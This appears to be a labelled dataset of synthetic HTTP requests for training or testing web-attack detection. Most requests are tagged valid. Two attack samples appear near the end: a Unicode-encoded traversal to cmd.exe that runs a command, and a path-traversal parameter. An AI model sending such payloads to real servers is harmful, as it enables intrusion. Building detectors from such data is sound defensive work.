If-Range: Sat, 09 May 09 10:53:03 GMT
Max-Forwards: 9
MIME-Version: 1.4
Pragma: pmL=tfpTde
Proxy-Authorization: Basic cXNjMWlvOnRzdGNzOWQ=
Authorization: NTLM b3VyYWFhQXJNbnBvdWFBdGVhYWVhd2hCbG1iaWVlZmFob2Z6dG4=
Range: 0907-97
Referer: /mlLfos.gif
TE: gzip;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/4.1 (Windows; U; Win 9x 0.4; oe-ne; rv:9.8.0) Gecko/75442982
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: HTTP/8.3 www.eorieeh.gif, HTTP/7.1 www.o9wedauh.css
Transfer-Encoding: deflate
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 652 172.163.128.242:14057 "meiaHl" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17197
Start - Id: 9357
class: Valid
GET /e0z/oboeTuaasdko/so08aui1nOxzamb/MEHtD23/h7Rmte_U9wKv508h9/P-e/uPIXDDQ9AreiLhi/ayt8mxMb/fd@yihzrfJ@b-/iGyk/mzMatsstNosdn/clxro5nE.swf?o5rostrog6scee7=s6L&GypGG=n%3Biige8%3Dlreadoe&4vhNwa7ede8eck=%40npotrga&Eeorj=+&includeuCJeusr=89&owolzRnobaainet=as9rftphwyst%288r&sXd-=9te9hhsc%25uoiscript&20dysbdihruh=na7hendlberr&ObrPVnetcatu@Nz=983615&oaUwe4ow4ue=inhmdc9t5gef0Ml&A00To=iB.w8%40O9HO&dgje=+8like%3AI&Tal=passwd8i%3A&IeaergiotzaqRse=OlocationoiYwNfceal3c HTTP/1.0
Host: www.ndnaodsuxj.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-5;q=0.6, koi8, windows-1252;q=0.6
Accept-Encoding: identity;q=0.5, gzip, compress;q=0.3, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=733
Client-ip: 66.193.65.107
Cookie: jxk_= iire@tee3cshutdowno;K1DR=rTdrophi
Cookie2: $Version="4"
Date: Sun, 13 Sep 09 19:03:57 CET
ETag: "ylCyZG79u0xBFHA1Lc"
Expect: gEwhEed=lqmenxb
From: psuoabb@iAeo.fr
If-Modified-Since: Sat, 13 Jan 07 23:46:45 CET
If-Unmodified-Since: Tue, 22 Mar 05 09:38:54 UTC
If-Match: *
If-None-Match: "Ao3eGAoHl4Ett-MoHem3"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: alhb86='iLn'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic bmVtSTQ6bjJ0c3ls
Range: 446262-
Referer: /ts1sss/dsqmdeu3/diAba/seahf/adTwshh.asmx
TE: trailers,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: inGRf4 http://www.andgaav.st
UA-CPU: Sparc
UA-Disp: 6680,235,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 4ona/9.6 www.pesdt.js, HTTP/9.9 www.eotelan.html:210
Transfer-Encoding: gzip
Upgrade: r76ci/2.9, b34o/1.0, Rco/2.1, tqi/3.8, elk/3.0
Warning: 450 www.Oox1sn.shtml "hEnhegeYhoEhdatS" "Fri, 15 Aug 08 17:00:58 CET"
X-Forwarded-For: 74.205.168.33
X-Serial-Number: 169179883
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9357
Start - Id: 30166
class: Valid
GET /0wTqx4t/binaaeaniiam/nGeitaioehlR/oQNqV_p/ifjcHnQ./r1mte9sw1fansptntea/rcTgtGmuxxOK3rvy.s/tIlTaarcy/oLdrnevettHz/1uP/s1ZejGXPrnz.gif?96m3tmp=chelAsuy+xp_nczn&rbnofnICnspein=itstitthIOoojelot&yci=ru2QNkkp HTTP/1.1
Host: www.t1eceeajE.cz:784
Connection: close
Accept: audio/*, image/*;q=0.8, video/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: n2et1hjf-Nedi1, nttrtij-bus1vt, R-ias
Cache-Control: max-stale
Client-ip: 111.9.97.121
Cookie: g1nbU=n09c9T;pos=v1pteubf4;hbabaaf=eiapysiooa
Cookie2: $Version="3"
Date: Sun, 11 Apr 10 22:08:38 UTC
ETag: W/"4hV9eT4suKbxB0H@b86T"
Expect: 100-continue
From: i4siaaa@hedct.com
If-Modified-Since: Fri, 26 Dec 08 18:11:36 UTC
If-Unmodified-Since: Fri, 26 Jan 07 07:44:04 UTC
If-Match: *
If-None-Match: "0d9xVwib9h.y2KC"
If-Range: *
Max-Forwards: 3315
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="nhmycNt"
Authorization: NTLM amNORGFsaXREbmUzaWVjcTRpc3JubWFyc2liRGR0OGV1aFVpZUVoRzBVRWViZQ==
Range: -659145,-9105
Referer: http://www.tetrwo.st/uehrgsH/ei9int.pl
TE: gzip,gzip
Trailer: Upgrade
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 0.2; ti-Fl; rv:3.2.6) Gecko/88566558
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: FTP/0.6 www.HdxrqS.png:2087
Transfer-Encoding: compress
Upgrade: lk6a5e/0.8, Agoqga/0.6, lnr6p/2.4, wsi/3.9
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 89792180313370597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30166
Start - Id: 17006
class: Valid
GET /DmaFbinHY/nwsJstdinxGn/hnewhnvafoamo5yfurif/anuuhzdBrdlMcnao/muat84a8sEtq/Ine0q7CA7ormdixOs/eoexenvsr/dQ/rn0eefrneb/rrnevjSepp.gif?G1t=7975468098&cs=M HTTP/1.1
Host: www.i3oqZdha.ch:6909
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 6-lar;q=0.7, nieeeds-zNoerdgx;q=0.2, rjMda-scE
Cache-Control: nasen=ehwEitp
Client-ip: 181.128.235.48
Cookie: on6ohhudnssz=pI3avcJ4@f3O
Cookie2: $Version="11"
Date: Sun, 02 Nov 08 14:35:51 CET
ETag: "4SlloZx1TGi3_yjS.N1i"
Expect: erE2E6i=yatt4c;tiKciwns=lw2f
From: aYei@It3si.net
If-Modified-Since: Fri, 24 Sep 04 01:16:25 GMT
If-Unmodified-Since: Sat, 07 Feb 09 08:50:54 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Jun 06 14:05:45 CET
Max-Forwards: 450
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: ayD9e codPhMon=eailrU
Authorization: hosg Olsuo4=hmg2otzq
Range: 083284-20717,966433-49880
Referer: /Tfncmooe/tsmglOm/gzse/unigai/h79t.gz
TE: trailers,deflate;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/2.7 (Windows; U; Win 9x 1.7; aw-og; rv:6.3.1) Gecko/62030855
UA-CPU: StrongARM
UA-Disp: 065,8353,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 044x401
Via: HTTP/5.4 www.1mho5.jpg, 9.4 214.162.178.191, 8.6 117.247.251.234:2
Transfer-Encoding: gzip
Upgrade: ezefet/1.8, osoewT/7.9, itotdi/5.4, s0ooH/7.4
Warning: 449 www.oaah.tiff "trlelutje" 
X-Forwarded-For: 208.229.111.62
X-Serial-Number: 380344
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17006
Start - Id: 6348
class: Valid
POST /e.on8j4Bq@_8/onaEtytiFs/dte3iogiltAeslhiwoj1/netcsram8Stse5Oes/09systemU/KYobjectAOCje6vrd9/YjMobjectvarXVp3EQh/hpedrefe/aCVm/4Rkdvu3aH/tOxLlvuq7WBU5/cidhye.pl? HTTP/1.1
Content-Length: 183
Content-Language: g8b
Content-Encoding: deflate
Content-Location: /esoo/kmHnR/i4eg7eoz/yfnfgure.exe
Content-MD5: RW82a2liYm9hbm9hZWx6bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Apr 06 21:52:51 UTC
Last-Modified: Fri, 16 Dec 05 05:40:40 UTC
Host: www.ievltont0t.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 176.137.0.206
Cookie: hQeao=8fTsi(o+ean3rl
Cookie2: $Version="073"
Date: Fri, 06 Jan 06 19:03:33 CET
ETag: W/"Jf.cuX_UWu5ZO8OfC"
Expect: 100-continue
From: 6slThi@serrsRm.gov
If-Modified-Since: Sun, 06 May 07 21:16:55 GMT
If-Unmodified-Since: Sun, 20 May 07 12:57:06 CET
If-Match: "MZXsrSJ6@3stpgwObV"
If-None-Match: *
If-Range: "oD8tIrNY4khq85."
Max-Forwards: 82
MIME-Version: 3.4
Pragma: nE=ncnj
Proxy-Authorization: NTLM aHBob3RvbnRtaXRzY2VyZXJuYnRleXJ2blJyYXNtOWh0MWZ0N2Voc210YW9jYUUz
Authorization: 9dzN otegotRg=te5tgt7
Range: 00-,-67542,3-02025
Referer: http://Ajsh.be/uacpu/taOne.jsp
TE: trailers,chunked,trailers
Trailer: If-None-Match
User-Agent: neoi/4.9.5.9.5
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 538x5612
Via: 9.6 www.ahvoeee.gif, 0.0 77.198.120.58, 4.1 www.4snot.jpg
Transfer-Encoding: compress
Upgrade: suom/1.1, roiwo/8.0
Warning: 558 185.158.218.63 "1di3vy7ene9psr" "Sun, 23 Apr 06 02:25:49 GMT"
X-Forwarded-For: 253.132.79.208
X-Serial-Number: 24665445905295442
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ttWjs2etajtak=nawi&&sx=8niea4tunxc1&862Mecho1=e%&estdd=269444&Cofwll=6&eeabaaslmly9sa=nw 1c0\s3&ohc=qs0tmnioijsar&oolbTcbStea=85911809&dS@linktYIduCP=991420&tbry2jawernoh=832485

End - Id: 6348
Start - Id: 19208
class: Valid
GET /em/rDxLgyap/tRa_.qKrA7K1aCl_6/os/eaUhiobbeywav.aspx?deris=zbdl&pu1upAnm1=f%5Dto&iQe=652&dphuIetuzta=vc&ti02ujSr=cfp&grMdnOtnd=wejhe&ayi0eaaa2beuaq=csil&hriehfzetxrk=obPseo6 HTTP/1.1
Host: 254.148.233.168
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lcsi4Ri-reo
Cache-Control: only-if-cached
Client-ip: 192.23.168.186
Cookie: eoek=733541;aEcF=b+t delete;croace0=05
Cookie2: $Version="3"
Date: Wed, 12 Sep 07 04:39:15 UTC
ETag: W/"e01vwLN.7P.8EOwpqtmw"
Expect: 100-continue
From: qhr7o7@aeAfo9.biz
If-Modified-Since: Wed, 10 Dec 08 16:56:20 CET
If-Unmodified-Since: Mon, 18 Feb 08 19:09:25 CET
If-Match: "dWvuqz_bScYv1t26ubmc"
If-None-Match: *
If-Range: Sat, 28 May 05 19:15:23 CET
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: NTLM cGhSYWFpNW5DdW90ZW1lZHRoOXBiVGVldG1zbmZhNzU=
Range: 967604-010774,-548402
Referer: /ntiHrde/ralenstO.jpeg
TE: trailers,deflate;q=0.1
Trailer: Authorization
User-Agent: u6VDP6 http://www.doosiza.fr
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 203x411
Via: HTTP/4.1 141.47.102.53, 3.6 112.12.50.120:135, 0.0 www.dOyO7o.gif
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 029 127.20.136.35 "dl4wautaiaocAelifw" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19208
Start - Id: 21631
class: Valid
GET /9rEhue/iuuitMesDaB/mgthtH/ie/ichnfheeatlv/3xq/4jMstdinj98.aspx?gfslA=y&4autfh=2046242&ahoEAas1t=1900&klog9uGeBL=375342167&gtceuaea=aMtelnetih&nsea=jRen%40%24e6ue&5btznfynialu=%5Bslibz&czzoip=toJ8&y7gj=4vuom&m1uroe=osd&paw4=zc&noit=%24Sa HTTP/1.0
Host: 249.151.242.156
Connection: iyp7fS
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.5, x-mac-roman;q=0.5, x-mac-korean
Accept-Encoding: *;q=0.3
Accept-Language: lc1-edre9Rct, hwtiui-zorcy
Cache-Control: no-transform
Client-ip: 104.2.6.68
Cookie: ta=owrS ;nr
Cookie2: $Version="089"
Date: Thu, 15 Apr 04 05:13:01 CET
ETag: "dvq2t6rH3wBPA0V"
Expect: 100-continue
From: Fuehptal@tmsni.ch
If-Modified-Since: Sun, 13 Aug 06 24:27:33 UTC
If-Unmodified-Since: Sun, 26 Nov 06 12:59:42 CET
If-Match: "0y4sQZ8W3jhxs7D7W4"
If-None-Match: *
If-Range: *
Max-Forwards: 9706
MIME-Version: 5.4
Pragma: garnCt1=phfxeetN
Proxy-Authorization: Basic YXV1MVNpOmVhM2F1ZW8=
Authorization: NTLM c2FzbW1rdG5oYXRzcmRzZGVldGhoY2xpNjJlbG5MZHJlcW90
Range: 37-,-5477
Referer: http://etiy.org/6sr4no/hteoxT.jsp
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 6.7; al-tR; rv:0.3.0) Gecko/48023590
UA-CPU: x86
UA-Disp: 191,321,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 767x833
Via: sett2/3.8 www.eeyzuk43.png
Transfer-Encoding: deflate
Upgrade: rta/6.9, hinor/4.0
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 4331077002
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21631
Start - Id: 30488
class: Valid
GET /bu/naqmtcIhiaHQh/r1e/sxiie/qNk.html?eto=eMmstee3Ie&iPioittosr=sueanda&ksiismh=355912&hR=iEVtro3ELsc&i4wgnhueqaei=3umaphphUhguO%40&2DsrayR=ebhsIblmfinr&i6e=hiebins&egtuEeTmoSHls=0KikJU.xN&BW7EHKbr=549487&l.NqInodev4Z=JhTRelCtrfiuni&aHev1ntottexU=rbhtTro&li=6a HTTP/1.0
Host: 64.114.147.145
Connection: close
Accept: image/jpeg;q=0.3, text/*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.5, iso-10646-ucs-2;q=0.3, x-mac-chinesesimp;q=0.4, iso-8859-3, iso-8859-3;q=0.8
Accept-Encoding: gzip
Accept-Language: neteNe-voSgn, ui9tqlue-h, ntirtfs-oewnc
Cache-Control: no-transform
Client-ip: 167.195.15.186
Cookie: samIrNBxENMyh=pczzeODX
Cookie2: $Version="618"
Date: Fri, 06 Mar 09 04:41:30 UTC
ETag: W/"fXBqUQvh.Hz86GZ2"
Expect: 100-continue
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Tue, 17 Aug 04 08:54:01 GMT
If-Unmodified-Since: Wed, 11 May 05 21:47:23 UTC
If-Match: *
If-None-Match: "@Mi6reWATWl30Lo1LQyE"
If-Range: *
Max-Forwards: 40
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM dW5pR3JsY3ZhaUVzZXJldHRkOVNQdWhldGJhdXc0N25ldmRuaVNiRWJvc2lk
Authorization: Digest algorithm=MD5
Range: 32-29,033002-861540
Referer: http://www.ng3ox.net/safbo.bin
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: bRh4Mgw. http://www.PehfDil9.be
UA-CPU: x86
UA-Disp: 273,999,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 710x3564
Via: FTP/5.5 80.143.125.18:6359
Transfer-Encoding: compress
Upgrade: tsn/6.7
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 205.107.245.45
X-Serial-Number: 9887656877315806
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30488
Start - Id: 7801
class: Valid
POST /neECHs/u9UD/gUTI6/sU9J8v/siegxmofutgosvsts/h5V_UO/wiDaiSfue4/emM.php3? HTTP/1.0
Content-Length: 45
Content-Language: ts,eale
Content-Encoding: gzip
Content-Location: /sicmo.jpg
Content-MD5: cm5kcnNEbjNhd2lucDh1RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 May 09 04:26:29 GMT
Last-Modified: Mon, 27 Nov 06 24:58:33 UTC
Host: www.tta9wysu.fr
Connection: hintz
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 248.78.197.68
Cookie: aafao3ieemcdab=uautruitto7Oyem;gufWaaa8=sa ;vUulRrocsepn=3144873
Cookie2: $Version="5"
Date: Sun, 12 Feb 06 12:16:56 UTC
ETag: "pv8K77Ny6oubgxEZR1"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Sun, 11 Dec 05 02:31:13 GMT
If-Unmodified-Since: Wed, 17 Jan 07 08:58:15 GMT
If-Match: *
If-None-Match: ".fO.jrjU4FZuuG4paQ"
If-Range: "NNnEvxu-DoSpr1U"
Max-Forwards: 40
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic VHNkZGF4OmJlbDVlcw==
Authorization: Basic YWRwYWFzOnFmc2lt
Range: 6-
Referer: /Kbed.png
TE: deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/8.0 (compatible; MSIE 5.1; SunOS sun4u; Taie; MianTo; romonosf)
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.8 89.72.48.85, HTTP/4.6 www.w5ta.js
Transfer-Encoding: deflate
Upgrade: hZ1Tjt/9.1, t5sa/5.7, ibgt1/8.3
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 119.57.6.212
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ei=55924&iuauruteicl=wniNT-6k@SPR&teOAeh=01

End - Id: 7801
Start - Id: 31214
class: Valid
GET /da3/zcn4Ewas3PX@2XhRm..swf?np6bitlurXSwme=s1e+n+n&soinrowMmaha2ta=dnlnUt1A7zslRh&0caowa9=5778570&Yj6rL=eaaltFeae HTTP/1.1
Host: www.uiel.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.5, iso-2022-kr, utf-8;q=0.1, iso-8859-9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 125.51.6.162
Cookie: CrijhamnnKle=l9kAW;@LmQZ=nHj;3de=%eahn<tw
Cookie2: $Version="8"
Date: Sat, 20 Oct 07 05:18:01 UTC
ETag: "-HMkfYEV6tg0L7ai8R"
Expect: 100-continue
From: sa5eas@oUEOt.de
If-Modified-Since: Tue, 21 Jul 09 03:57:53 CET
If-Unmodified-Since: Sat, 17 Feb 07 01:17:11 UTC
If-Match: "xUPPxC_RP27pPkK.0I9G"
If-None-Match: *
If-Range: "NPfMLO3d_cD91E4"
Max-Forwards: 79
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: 7aezxs 8Dne=amvntcfl
Authorization: Digest qop=auth-int
Range: 8-
Referer: http://6ernn.ch/5radasyn/heyenpf/tToeiua0/se7ie/witzeToU.swf
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.6 (Windows; U; Win98 5.7; ue-dw; rv:6.9.0) Gecko/33015245
UA-CPU: StrongARM
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x453
Via: oee/7.0 92.76.31.152:92, HTTP/6.1 www.5qs1ln.png:08, 4fn/1.8 www.dauisdi.png
Transfer-Encoding: deflate
Upgrade: tehdl/3.7, dmy4i/4.8, yche/8.1, run/1.6
Warning: 816 106.144.10.255 "FhwteaHn0a" "Wed, 27 May 09 19:09:38 UTC"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 90454333
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31214
Start - Id: 32829
class: Valid
PUT /9omOeebxweimb2or5t/K6/pghryXk5SS4y/B92mzXHhWfuIb/i-eGe6ECLlxMUwl7CSL6/aog/d0/sneatnkhslasnetnHyh.tiff? HTTP/1.0
Content-Length: 273
Content-Language: yfnuanr,vTnO
Content-Encoding: identity
Content-Location: http://www.E3tsSa1.cz/attma/arssnom/o8r8tVcl.jpg
Content-MD5: czVlbjE5aDNyTGhhc2ZNZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Sep 05 22:12:25 CET
Last-Modified: Sun, 29 Oct 06 08:46:20 UTC
Host: 3.112.121.195
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: i=sc
Client-ip: 69.181.132.119
Cookie: nslihceeW0o=965923
Cookie2: $Version="52"
Date: Tue, 23 Nov 04 17:31:35 UTC
ETag: W/"21a5JVWYw99hUUZSgNhE"
Expect: rdlslz=jdHI;ep23s4a=epna0to
From: hqso@atPmE.de
If-Modified-Since: Wed, 14 Jan 09 06:40:19 GMT
If-Unmodified-Since: Wed, 31 Mar 04 24:52:39 UTC
If-Match: "x.TiWZNdfWg5jfmm"
If-None-Match: ".SL5fhzZi8PM@YU7k-8"
If-Range: Sun, 08 Apr 07 04:18:43 CET
Max-Forwards: 2
MIME-Version: 0.7
Pragma: ehSte5=wii8ouoi
Proxy-Authorization: 1e5et aieatut=rah4tea
Authorization: Basic ZWZoZkFpYTI6Ymllcw==
Range: 857-089
Referer: http://iaottr4h.uk/ydASd.jsp
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/4.4 (Windows; U; WinNT 9.5; eE-aa; rv:2.4.7) Gecko/82145391
UA-CPU: x86
UA-Disp: 6288,1100,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6456x9806
Via: nvsa/6.8 126.64.114.4:51, HTTP/2.1 195.155.33.89, 5.8 www.3iNdism.htm
Transfer-Encoding: gzip
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 175 www.sl7Ocpt.jpg:342 "0uw6Ne" "Fri, 08 Feb 08 18:17:21 CET"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

jtedE7EeDee1L=oam&6edSN=nn1twzyGimgoa&0aeset=toeineoof&mn9tiw=hzhonr1e2i]t/&p1hdjiiea=iEy-x&HMx-T7kz6FGz=i-x8sgtithEu&deiio4thSy=235074130&ioodt9neJ= eomnn ys&0R_khopen=aiL2Mw&on=nnsie@mKD<e[fs&9N=rmcom&eaqQtg=qsyu5lWY@&cqsardctutcsm=0&mrci=40&uRnoYea7n=5489259

End - Id: 32829
Start - Id: 43770
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.OqhQ.de
Connection: keep-alive
Accept: text/plain;q=0.6, application/*;q=0.4, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: ao='p8'
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="937"
Date: Thu, 03 May 07 18:15:16 CET
ETag: "jz@gJWZ7STu9UBH8J@"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Thu, 29 Jan 09 02:35:57 UTC
If-Unmodified-Since: Tue, 25 Oct 05 05:57:49 CET
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: "EGU7l-Ye4iMV_T0X-"
If-Range: Fri, 13 Mar 09 02:50:55 UTC
Max-Forwards: 34
MIME-Version: 7.5
Pragma: reet=aek
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://rneiu.ch/hhTep/bRote/iDthd/gfse.tar.gz
TE: chunked;q=0.7,trailers
Trailer: From
User-Agent: sR1we4s4
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: nliaoi
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43770
Start - Id: 10144
class: Valid
GET /A3G3htpassAtvM4ZpVQ/9HMmE9wxY66h91/aOiu/e9gHAOJFKcjJ5/t31up1Vz6p2BEvWFl5G/e6et/4qri3w/clneolubsrninbihrn.php4?lihlmdoherEt=718159&Il=879686198&f3ulbtelsonrco=totcu&aa=wm5inEksawpsooscript%7Cte%28&ftpHcPYnjb=l0ai&st3nbrote8yiR=hyNK&cnifS=3ExZn&ttGsioemiS=381561717&5hirioeoEpm5=hrylliMoba2&eeekezdfat=957773819&a1sEssAtcmo=0szunioneiYcwindow.openter3r+iand&fshefi=3 HTTP/1.1
Host: www.fUoOirie1.biz
Connection: keep-alive
Accept: image/*, image/jpeg
Accept-Charset: hz-gb-2312;q=0.0, x-mac-ce;q=0.6, koi8
Accept-Encoding: 
Accept-Language: Mq-dtTy8qo, hsodo-hs, m-aastrl, oy-ispnd
Cache-Control: ewg=v5tokt
Client-ip: 204.166.14.191
Cookie: tt6eto=otCYOP9ikF;TDCpositiongFchildpvL=nEfgeuionninaoa
Cookie2: $Version="9"
Date: Thu, 28 May 09 20:45:12 CET
ETag: W/"@_LdD5SoTth2FBGOiH8n"
Expect: wsnon
From: ekUhha@brtt.fr
If-Modified-Since: Sun, 05 Aug 07 13:54:51 UTC
If-Unmodified-Since: Fri, 16 Oct 09 15:42:56 CET
If-Match: *
If-None-Match: "mOhci-R.AZl27di"
If-Range: "UkruJmdpSFCT10S"
Max-Forwards: 6559
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Digest qop=ellhs
Range: -2030
Referer: http://www.jyba3ae.de/aafme/mivdE/zcAls/aasen/enztr.php4
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.8 (compatible; MSIE 1.3; Linux i386; ehrQy; tamuOcsto)
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 012x3228
Via: FTP/0.1 187.76.226.254:35, FTP/3.6 www.th8Pesuw.png
Transfer-Encoding: compress
Upgrade: tUhw/7.8
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10144
Start - Id: 45811
class: PathTransversal
GET /m5vn/mj.SXUshutdowntKbgS/oa1je6aemtE/ss6nro/vE/rr2eu5fdnumeaw7h7.msf?6sbeghtnq8aP=oL1pAe1Y6td&0tAenEtaarogcha=976&pt_LIO=ezOjqQ&pDjAwF=n%27nneaeosr++d%2F8eSa&hnGsfeo9e=7268&sActmWtu5=tkOQFsr2&2_66=92&ehieuselyt=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fanne%2Ferorlael%2Fritaonin%2Ficveliastr.pl&ieefbs8xdll=snd1sa&4xDM413REc7=riaOrhnyxna&o4u=%3Ce+ot&a91leetOuo=6GOC2b&nu2wodnkuH=5&2YRscatQs3nH4=%2BhttpldivmrDesia-eti&enors=80310 HTTP/1.0
Host: 210.182.212.248:07969
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1251, iso-8859-4
Accept-Encoding: identity, deflate;q=0.8, compress, compress
Accept-Language: *
Cache-Control: min-fresh=046
Client-ip: 241.101.131.168
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="085"
Date: Mon, 26 Oct 09 14:27:30 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: rpAl@yhsq9eT1.st
If-Modified-Since: Fri, 26 Dec 08 22:37:09 UTC
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
